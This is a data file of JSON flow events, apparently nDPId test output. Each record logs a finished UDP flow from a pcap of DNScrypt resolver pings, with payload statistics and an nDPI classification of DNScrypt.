+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312407,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":35634,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":40374,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304810,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305328,"flow_last_seen":946739305354,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400553,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":50757,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312399,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":54112,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337214,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":35734,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318175,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":35903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312179,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":53887,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305214,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337183,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":38508,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":48159,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304397,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317461,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":51363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318170,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":40138,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318168,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":50387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400553,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":57109,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381016,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":50403,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304788,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318168,"flow_last_seen":946739318202,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":37328,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400519,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":59354,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337077,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":49975,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348915,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317493,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":60091,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":57636,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318201,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":33279,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":60334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312405,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":40099,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402356,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317434,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":48065,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312136,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304815,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396214,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":55185,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304793,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311308,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
